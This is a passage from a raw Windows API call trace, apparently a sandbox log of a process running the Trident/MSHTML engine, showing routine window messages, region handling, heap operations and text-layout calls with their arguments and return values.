out: lpAccelDst=0x0) returned 2 [0164.243] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.243] CopyAcceleratorTableW (in: hAccelSrc=0x703a3, lpAccelDst=0xcfb730, cAccelEntries=2 | out: lpAccelDst=0xcfb730) returned 2 [0164.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0164.243] GetMessagePos () returned 0x11e01d6 [0164.243] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x104, wParam=0x12, lParam=0x20380001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0164.243] NtdllDefWindowProc_W () returned 0x0 [0164.243] GetCurrentThreadId () returned 0xb48 [0164.244] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.244] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0164.244] NtdllDefWindowProc_W () returned 0x0 [0164.366] NtdllDefWindowProc_W () returned 0x0 [0164.366] NtdllDefWindowProc_W () returned 0x0 [0164.368] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0164.368] IsIconic (hWnd=0x103e0) returned 0 [0164.368] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0164.368] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0164.368] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0164.368] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0164.368] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0164.368] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0164.368] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0164.368] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0xe040a78 [0164.368] GetUpdateRgn (hWnd=0x103e2, hRgn=0xe040a78, bErase=0) returned 1 [0164.368] DeleteObject (ho=0xe040a78) returned 1 [0164.368] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0164.369] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.369] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0164.369] NtdllDefWindowProc_W () returned 0x0 [0164.369] GetCurrentThreadId () returned 0xb48 [0164.369] GetCurrentThreadId () returned 0xb48 [0164.371] NtdllDefWindowProc_W () returned 0x0 [0164.372] NtdllDefWindowProc_W () returned 0x0 [0164.373] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0164.373] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0164.373] NtdllDefWindowProc_W () returned 0x1 [0164.376] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0164.401] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0164.401] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0164.401] NtdllDefWindowProc_W () returned 0x0 [0164.401] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0164.401] NtdllDefWindowProc_W () returned 0x0 [0164.402] NtdllDefWindowProc_W () returned 0x0 [0164.402] NtdllDefWindowProc_W () returned 0x0 [0164.402] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.402] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0164.402] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0164.402] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0164.402] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0e0 | out: lpPoint=0x19a0e0) returned 1 [0164.402] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0164.403] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0164.403] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0164.403] GetMessagePos () returned 0x11e01d6 [0164.403] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199fd4 | out: plResult=0x199fd4) returned 0x1 [0164.403] NtdllDefWindowProc_W () returned 0x0 [0164.403] GetCurrentThreadId () returned 0xb48 [0164.404] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.404] GetMessagePos () returned 0x11e01d6 [0164.404] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ccc | out: plResult=0x199ccc) returned 0x0 [0164.404] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.404] GetMessagePos () returned 0x11e01d6 [0164.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.405] memcpy_s (in: _Destination=0xd96480, _DestinationSize=0x118, _Source=0xd96360, _SourceSize=0x118 | out: _Destination=0xd96480) returned 0x0 [0164.405] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd00 [0164.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0164.405] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0164.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0164.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.406] memcpy_s (in: _Destination=0xd965a0, _DestinationSize=0x118, _Source=0xd96360, _SourceSize=0x118 | out: _Destination=0xd965a0) returned 0x0 [0164.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcee0 [0164.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0164.407] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0164.408] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0164.408] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.408] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcee0 | out: hHeap=0x5e0000) returned 1 [0164.408] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x19958c | out: plResult=0x19958c) returned 0x0 [0164.408] GetCurrentThreadId () returned 0xb48 [0164.409] GetCurrentThreadId () returned 0xb48 [0164.409] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.409] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.409] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.409] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0164.409] IsIconic (hWnd=0x103e0) returned 0 [0164.409] GetCurrentThreadId () returned 0xb48 [0164.409] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.409] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.409] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.410] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0164.410] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.410] GetCurrentThreadId () returned 0xb48 [0164.410] GetCurrentThreadId () returned 0xb48 [0164.410] GetFocus () returned 0x0 [0164.411] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0164.411] GetCurrentThreadId () returned 0xb48 [0164.411] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098323019289) returned 1 [0164.411] GetCurrentThreadId () returned 0xb48 [0164.411] GetCurrentThreadId () returned 0xb48 [0164.411] GetCurrentThreadId () returned 0xb48 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3098323054608) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3098323064952) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3098323074415) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3098323080071) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3098323085481) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3098323102338) returned 1 [0164.412] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3098323111085) returned 1 [0164.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.413] SetEvent (hEvent=0x304) returned 1 [0164.413] WTSGetActiveConsoleSessionId () returned 0x1 [0164.413] GetCurrentProcessId () returned 0xe14 [0164.413] GetCurrentThreadId () returned 0xb48 [0164.414] SetEvent (hEvent=0x668) returned 1 [0164.414] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0164.414] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0164.415] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.415] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.415] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.415] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0164.415] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0164.415] GetCurrentThreadId () returned 0xb48 [0164.415] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.496] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.496] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.496] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0164.496] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.496] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.496] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.496] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.496] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0164.496] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098331545832) returned 1 [0164.497] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0164.497] NtdllDefWindowProc_W () returned 0x0 [0164.497] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.497] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.497] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.497] KillTimer (hWnd=0x30316, uIDEvent=0x200e) returned 1 [0164.498] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098331656641) returned 1 [0164.498] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0164.498] GetFocus () returned 0x0 [0164.498] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a147) returned 0 [0164.498] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.498] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcae4 | out: lpRect=0xcfcae4) returned 1 [0164.498] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.498] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098331737644) returned 1 [0164.498] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0164.499] CreateRectRgnIndirect (lprect=0x199ca0) returned 0xf040a78 [0164.499] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0164.499] GetRandomRgn (hdc=0x4010197, hrgn=0xf040a78, i=4) returned 1 [0164.499] OffsetRgn (hrgn=0xf040a78, x=-507, y=-333) returned 2 [0164.499] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0164.499] GetRegionData (in: hrgn=0xf040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0164.499] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c2d8 [0164.499] GetRegionData (in: hrgn=0xf040a78, nCount=0x30, lpRgnData=0x9f6c2d8 | out: lpRgnData=0x9f6c2d8) returned 0x30 [0164.499] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c2d8 | out: hHeap=0x5e0000) returned 1 [0164.499] DeleteObject (ho=0xf040a78) returned 1 [0164.499] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c188 [0164.499] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c188) returned 0x8c040a6c [0164.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c188 | out: hHeap=0x5e0000) returned 1 [0164.500] SelectClipRgn (hdc=0x4010197, hrgn=0x8c040a6c) returned 2 [0164.500] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c5e8 [0164.500] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c5e8) returned 0x23040a81 [0164.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c5e8 | out: hHeap=0x5e0000) returned 1 [0164.500] ValidateRgn (hWnd=0x103e2, hRgn=0x23040a81) returned 1 [0164.500] DeleteObject (ho=0x8c040a6c) returned 1 [0164.500] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.500] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0164.501] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.501] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68c168 [0164.502] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0164.502] HashData (in: pbData=0x9f83040, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.502] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.502] HashData (in: pbData=0x9f83044, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0164.502] HashData (in: pbData=0x9f82fb0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.502] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.502] HashData (in: pbData=0x9f82fb4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0164.502] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.502] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.502] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0164.502] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0164.502] HashData (in: pbData=0x9f83160, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.502] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.502] HashData (in: pbData=0x9f83164, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0164.502] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.503] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83178 [0164.503] HashData (in: pbData=0x9f83178, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.503] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.503] HashData (in: pbData=0x9f8317c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83178 | out: hHeap=0x5e0000) returned 1 [0164.503] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0164.503] HashData (in: pbData=0x9f83028, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0164.503] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0164.503] HashData (in: pbData=0x9f8302c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0164.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0164.503] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0164.503] HashData (in: pbData=0x9f83118, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.503] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.503] HashData (in: pbData=0x9f8311c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0164.503] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0164.504] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.504] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.504] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0164.504] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0164.504] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.504] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.504] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0164.504] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0164.504] HashData (in: pbData=0x9f831c0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.504] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.504] HashData (in: pbData=0x9f831c4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0164.504] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.507] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0164.507] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.507] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.507] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.507] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0164.507] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0164.507] HashData (in: pbData=0x9f83028, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0164.507] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0164.507] HashData (in: pbData=0x9f8302c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0164.507] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0164.507] LsSetDoc () returned 0x0 [0164.507] LsCreateLine () returned 0x0 [0164.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.508] LsdnFinishRegular () returned 0x0 [0164.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.508] LsdnFinishRegular () returned 0x0 [0164.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.509] LsDisplayLine () returned 0x0 [0164.509] IOleInPlaceFrame:SetMenu (This=0xd90840, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0164.509] IOleInPlaceFrame:SetMenu (This=0xd90820, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0164.509] GetSysColor (nIndex=8) returned 0x0 [0164.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.509] GetSysColor (nIndex=8) returned 0x0 [0164.509] LsDestroyLine () returned 0x0 [0164.509] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0164.509] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b60 [0164.509] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0164.510] 